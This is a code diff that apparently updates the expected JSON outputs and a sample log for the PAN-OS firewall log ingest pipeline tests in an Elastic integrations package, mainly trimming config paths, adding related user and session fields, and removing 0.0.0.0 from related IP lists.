08:50:28,007058000248010,CONFIG,0,2816,2023/10/04 08:50:28,81.2.69.193,,move,admin,Web,Succeeded, vsys vsys1 rulebase security rules block-1.1.1.1,,,7286123782408765487,0x0,0,0,0,0,,PA-VM,0, 1,2023/10/04 08:27:38,007058000248010,CONFIG,0,2816,2023/10/04 08:27:38,81.2.69.193,,override,admin,Web,Failed, deviceconfig system device-telemetry,,,7286123782408765440,0x0,0,0,0,0,,PA-VM,0, +1,2024/02/29 16:59:40,01234567890,CONFIG,0,2561,2024/02/29 16:59:40,81.2.69.193,,edit,admin,Web,Succeeded, vsys vsys1 address test123,"test123 { description ""this, is a test. with, three comma, x4""; } ","test123 { description ""this, is a test. with, three comma, x5""; } ",7304387121517691189,0x0,0,0,0,0,,PA-VM,0,,0,2024-02-29T16:59:40.421+01:00 diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-config-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-config-sample.log-expected.json index bfb644f6574..a1561010975 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-config-sample.log-expected.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-config-sample.log-expected.json @@ -40,7 +40,7 @@ "device_group_hierarchy3": "0", "device_group_hierarchy4": "0", "device_group_id": "0", - "path": " config shared log-settings iptag match-list ip-tag", + "path": "config shared log-settings iptag match-list ip-tag", "result": "Succeeded", "sequence_number": "1234567890", "sub_type": "0", @@ -53,6 +53,9 @@ ], "ip": [ "81.2.69.193" + ], + "user": [ + "admin" ] }, "tags": [ @@ -99,7 +102,7 @@ "device_group_hierarchy3": "0", "device_group_hierarchy4": "0", "device_group_id": "0", - "path": " config shared log-settings globalprotect match-list globalProtect", + "path": "config shared log-settings globalprotect match-list globalProtect", "result": "Succeeded", "sequence_number": "1234567890", "sub_type": "0", @@ -112,6 +115,9 @@ ], "ip": [ "81.2.69.193" + ], + "user": [ + "admin" ] }, "tags": [ @@ -151,7 +157,7 @@ "panos": { "action_flags": "0x0", "admin": "admin", - "after_change_detail": "reset-adult 73a06abf-75ca-436f-9319-1a15b27fa692 { to [ public ]; from [ private ]; source [ any ]; destination [ any ]; source-user [ any ]; category [ adult ]; application [ any ]; service [ application-default ]; source-hip [ any ]; destination-hip [ any ]; action reset-client; icmp-unreachable yes; log-start yes; rule-type interzone; } ", + "after_change_detail": "reset-adult 73a06abf-75ca-436f-9319-1a15b27fa692 { to [ public ]; from [ private ]; source [ any ]; destination [ any ]; source-user [ any ]; category [ adult ]; application [ any ]; service [ application-default ]; source-hip [ any ]; destination-hip [ any ]; action reset-client; icmp-unreachable yes; log-start yes; rule-type interzone; }", "client_type": "Web", "cmd": "set", "device_group_hierarchy1": "0", @@ -159,7 +165,7 @@ "device_group_hierarchy3": "0", "device_group_hierarchy4": "0", "device_group_id": "0", - "path": " vsys vsys1 rulebase security rules reset-adult", + "path": "vsys vsys1 rulebase security rules reset-adult", "result": "Succeeded", "sequence_number": "7286123782408765488", "sub_type": "0", @@ -172,6 +178,9 @@ ], "ip": [ "81.2.69.193" + ], + "user": [ + "admin" ] }, "tags": [ @@ -218,7 +227,7 @@ "device_group_hierarchy3": "0", "device_group_hierarchy4": "0", "device_group_id": "0", - "path": " vsys vsys1 rulebase security rules block-1.1.1.1", + "path": "vsys vsys1 rulebase security rules block-1.1.1.1", "result": "Succeeded", "sequence_number": "7286123782408765487", "sub_type": "0", @@ -231,6 +240,9 @@ ], "ip": [ "81.2.69.193" + ], + "user": [ + "admin" ] }, "tags": [ @@ -276,7 +288,7 @@ "device_group_hierarchy3": "0", "device_group_hierarchy4": "0", "device_group_id": "0", - "path": " deviceconfig system device-telemetry", + "path": "deviceconfig system device-telemetry", "result": "Failed", "sequence_number": "7286123782408765440", "sub_type": "0", @@ -289,6 +301,74 @@ ], "ip": [ "81.2.69.193" + ], + "user": [ + "admin" + ] + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2024-02-29T16:59:40.000-04:00", + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "cmd-edit", + "category": [ + "configuration" + ], + "created": "2024-02-29T16:59:40.000-04:00", + "kind": "event", + "original": "1,2024/02/29 16:59:40,01234567890,CONFIG,0,2561,2024/02/29 16:59:40,81.2.69.193,,edit,admin,Web,Succeeded, vsys vsys1 address test123,\"test123 { description \"\"this, is a test. with, three comma, x4\"\"; } \",\"test123 { description \"\"this, is a test. with, three comma, x5\"\"; } \",7304387121517691189,0x0,0,0,0,0,,PA-VM,0,,0,2024-02-29T16:59:40.421+01:00", + "outcome": "success", + "timezone": "-04:00" + }, + "host": { + "ip": [ + "81.2.69.193" + ] + }, + "message": "81.2.69.193,,edit,admin,Web,Succeeded, vsys vsys1 address test123,\"test123 { description \"\"this, is a test. with, three comma, x4\"\"; } \",\"test123 { description \"\"this, is a test. with, three comma, x5\"\"; } \",7304387121517691189,0x0,0,0,0,0,,PA-VM,0,,0,2024-02-29T16:59:40.421+01:00", + "observer": { + "hostname": "PA-VM", + "product": "PAN-OS", + "serial_number": "01234567890", + "type": "firewall", + "vendor": "Palo Alto Networks" + }, + "panw": { + "panos": { + "action_flags": "0x0", + "admin": "admin", + "after_change_detail": "test123 { description \"this, is a test. with, three comma, x5\"; } ", + "before_change_detail": "test123 { description \"this, is a test. with, three comma, x4\"; } ", + "client_type": "Web", + "cmd": "edit", + "device_group_hierarchy1": "0", + "device_group_hierarchy2": "0", + "device_group_hierarchy3": "0", + "device_group_hierarchy4": "0", + "device_group_id": "0", + "high_resolution_timestamp": "2024-02-29T11:59:40.421-04:00", + "path": "vsys vsys1 address test123", + "result": "Succeeded", + "sequence_number": "7304387121517691189", + "sub_type": "0", + "type": "CONFIG" + } + }, + "related": { + "hosts": [ + "PA-VM" + ], + "ip": [ + "81.2.69.193" + ], + "user": [ + "admin" ] }, "tags": [ @@ -296,4 +376,4 @@ ] } ] -} \ No newline at end of file +} diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log-expected.json index 310a52a1cab..03b3d65dda4 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log-expected.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-other-sample.log-expected.json @@ -30,13 +30,13 @@ }, "panw": { "panos": { + "action_flags": "0x0", "admin": "admin", - "after_change_detail": "0x0", - "before_change_detail": "0", "client_type": "Web", "cmd": "set", - "path": " config shared local-user-database user badguy", + "path": "config shared local-user-database user badguy", "result": "Succeeded", + "sequence_number": "0", "sub_type": "0", "type": "CONFIG" } @@ -44,6 +44,9 @@ "related": { "ip": [ "192.168.0.2" + ], + "user": [ + "admin" ] }, "tags": [ @@ -80,13 +83,13 @@ }, "panw": { "panos": { + "action_flags": "0x0", "admin": "admin", - "after_change_detail": "0x0", - "before_change_detail": "0", "client_type": "Web", "cmd": "set", - "path": " config mgt-config users badguy", + "path": "config mgt-config users badguy", "result": "Succeeded", + "sequence_number": "0", "sub_type": "0", "type": "CONFIG" } @@ -94,6 +97,9 @@ "related": { "ip": [ "192.168.0.2" + ], + "user": [ + "admin" ] }, "tags": [ @@ -130,12 +136,12 @@ }, "panw": { "panos": { + "action_flags": "0x0", "admin": "admin", - "after_change_detail": "0x0", - "before_change_detail": "0", "client_type": "Web", "cmd": "commit", "result": "Submitted", + "sequence_number": "0", "sub_type": "0", "type": "CONFIG" } @@ -143,6 +149,9 @@ "related": { "ip": [ "192.168.0.2" + ], + "user": [ + "admin" ] }, "tags": [ @@ -339,13 +348,13 @@ }, "panw": { "panos": { + "action_flags": "0x0", "admin": "badguy", - "after_change_detail": "0x0", - "before_change_detail": "0", "client_type": "Web", "cmd": "edit", - "path": " vsys vsys1 profiles url-filtering monzyspolicy", + "path": "vsys vsys1 profiles url-filtering monzyspolicy", "result": "Succeeded", + "sequence_number": "0", "sub_type": "0", "type": "CONFIG" } @@ -353,6 +362,9 @@ "related": { "ip": [ "192.168.0.2" + ], + "user": [ + "badguy" ] }, "tags": [ @@ -389,12 +401,12 @@ }, "panw": { "panos": { + "action_flags": "0x0", "admin": "badguy", - "after_change_detail": "0x0", - "before_change_detail": "0", "client_type": "Web", "cmd": "commit", "result": "Submitted", + "sequence_number": "0", "sub_type": "0", "type": "CONFIG" } @@ -402,6 +414,9 @@ "related": { "ip": [ "192.168.0.2" + ], + "user": [ + "badguy" ] }, "tags": [ @@ -1198,12 +1213,12 @@ }, "panw": { "panos": { + "action_flags": "0x0", "admin": "admin", - "after_change_detail": "0x0", - "before_change_detail": "0", "client_type": "Web", "cmd": "commit", "result": "Submitted", + "sequence_number": "0", "sub_type": "0", "type": "CONFIG" } @@ -1211,6 +1226,9 @@ "related": { "ip": [ "192.168.0.2" + ], + "user": [ + "admin" ] }, "tags": [ @@ -1247,13 +1265,13 @@ }, "panw": { "panos": { + "action_flags": "0x0", "admin": "admin", - "after_change_detail": "0x0", - "before_change_detail": "0", "client_type": "Web", "cmd": "edit", - "path": " vsys vsys1 profiles data-objects PII", + "path": "vsys vsys1 profiles data-objects PII", "result": "Succeeded", + "sequence_number": "0", "sub_type": "0", "type": "CONFIG" } @@ -1261,6 +1279,9 @@ "related": { "ip": [ "192.168.0.2" + ], + "user": [ + "admin" ] }, "tags": [ @@ -1480,8 +1501,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -1540,7 +1560,6 @@ "start": "2023-10-04T09:52:21.000+05:45", "timezone": "+05:45", "type": [ - "denied", "denied", "connection" ] diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log-expected.json index 64f416e1924..f43f1c044f8 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log-expected.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-threat-sample.log-expected.json @@ -134,8 +134,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -302,8 +301,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -471,8 +469,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -640,8 +637,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -809,8 +805,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -978,8 +973,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -1147,8 +1141,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -1315,8 +1308,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -1483,8 +1475,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -1651,8 +1642,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -1820,8 +1810,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -1987,8 +1976,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2155,8 +2143,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2322,8 +2309,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2491,8 +2477,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2659,8 +2644,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2825,8 +2809,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -2994,8 +2977,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -3161,8 +3143,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -3328,8 +3309,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -3496,8 +3476,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -3663,8 +3642,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -3831,8 +3809,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -3998,8 +3975,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -4165,8 +4141,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -4332,8 +4307,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -4499,8 +4473,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -4666,8 +4639,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -4833,8 +4805,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -5000,8 +4971,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -5167,8 +5137,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -5334,8 +5303,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -5501,8 +5469,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -5666,8 +5633,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -5833,8 +5799,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -6000,8 +5965,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -6166,8 +6130,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -6333,8 +6296,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -6499,8 +6461,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -6665,8 +6626,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -6831,8 +6791,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -6998,8 +6957,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -7164,8 +7122,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -7319,8 +7276,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "crusher" @@ -7483,8 +7439,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -7648,8 +7603,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -7813,8 +7767,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -7979,8 +7932,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -8144,8 +8096,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -8309,8 +8260,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -8475,8 +8425,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -8641,8 +8590,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -8807,8 +8755,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -8968,8 +8915,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "crusher" @@ -9132,8 +9078,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -9293,8 +9238,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "crusher" @@ -9452,8 +9396,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "crusher" @@ -9616,8 +9559,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -9777,8 +9719,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "crusher" @@ -9936,8 +9877,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "crusher" @@ -10100,8 +10040,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -10266,8 +10205,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -10432,8 +10370,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -10593,8 +10530,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "crusher" @@ -10757,8 +10693,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -10922,8 +10857,7 @@ "related": { "ip": [ "192.168.0.6", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "jordy" @@ -11074,8 +11008,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.6", - "0.0.0.0" + "192.168.0.6" ], "user": [ "jordy" @@ -11230,8 +11163,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.6", - "0.0.0.0" + "192.168.0.6" ], "user": [ "jordy" @@ -11393,8 +11325,7 @@ "related": { "ip": [ "192.168.0.6", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "jordy" @@ -11545,8 +11476,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.6", - "0.0.0.0" + "192.168.0.6" ], "user": [ "jordy" @@ -11708,8 +11638,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "picard" @@ -11860,8 +11789,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" @@ -12019,8 +11947,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.6", - "0.0.0.0" + "192.168.0.6" ], "user": [ "jordy" @@ -12175,8 +12102,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" @@ -12331,8 +12257,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" @@ -12487,8 +12412,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" @@ -12643,8 +12567,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" @@ -12806,8 +12729,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "picard" @@ -12958,8 +12880,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" @@ -13114,8 +13035,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" @@ -13270,8 +13190,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" @@ -13426,8 +13345,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" @@ -13582,8 +13500,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.6", - "0.0.0.0" + "192.168.0.6" ], "user": [ "jordy" @@ -13738,8 +13655,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "jordy" @@ -13894,8 +13810,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "jordy" @@ -14050,8 +13965,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "jordy" @@ -14206,8 +14120,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" @@ -14362,8 +14275,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" @@ -14518,8 +14430,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" @@ -14674,8 +14585,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" @@ -14837,8 +14747,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "picard" @@ -14989,8 +14898,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" @@ -15145,8 +15053,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "picard" @@ -15308,8 +15215,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "jordy" @@ -15460,8 +15366,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "jordy" @@ -15616,8 +15521,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "jordy" @@ -15772,8 +15676,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "jordy" @@ -15928,8 +15831,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "jordy" @@ -16084,8 +15986,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "jordy" @@ -16240,8 +16141,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "jordy" @@ -16400,8 +16300,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "crusher" @@ -16560,8 +16459,7 @@ "related": { "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "crusher" @@ -16769,8 +16667,7 @@ ], "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "schmidtdo" @@ -16780,6 +16677,9 @@ "name": "rule1", "uuid": "9d9738ea-f704-4b0f-90cf-a62bcbad0236" }, + "session": { + "start_time": "2022-11-29T12:59:46.000+10:00" + }, "source": { "geo": { "city_name": "Changchun", @@ -17006,8 +16906,7 @@ ], "ip": [ "175.16.199.1", - "192.168.0.2", - "0.0.0.0" + "192.168.0.2" ], "user": [ "schmidtdo" @@ -17017,6 +16916,9 @@ "name": "rule1", "uuid": "9d9738ea-f704-4b0f-90cf-a62bcbad0236" }, + "session": { + "start_time": "2022-11-29T12:59:46.000+10:00" + }, "source": { "geo": { "city_name": "Changchun", diff --git a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log-expected.json b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log-expected.json index ece09ea9d22..6a85e28bfb5 100644 --- a/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log-expected.json +++ b/packages/panw/data_stream/panos/_dev/test/pipeline/test-panw-panos-inc-traffic-sample.log-expected.json @@ -92,8 +92,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -213,8 +212,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -334,8 +332,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -455,8 +452,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -576,8 +572,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -697,8 +692,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -818,8 +812,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -939,8 +932,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -1060,8 +1052,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -1181,8 +1172,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -1302,8 +1292,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -1423,8 +1412,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -1544,8 +1532,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -1665,8 +1652,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -1786,8 +1772,7 @@ "related": { "ip": [ "192.168.0.2", - "175.16.199.1", - "0.0.0.0" + "175.16.199.1" ], "user": [ "crusher" @@ -1907,8 +1892,7 @@ "related": { 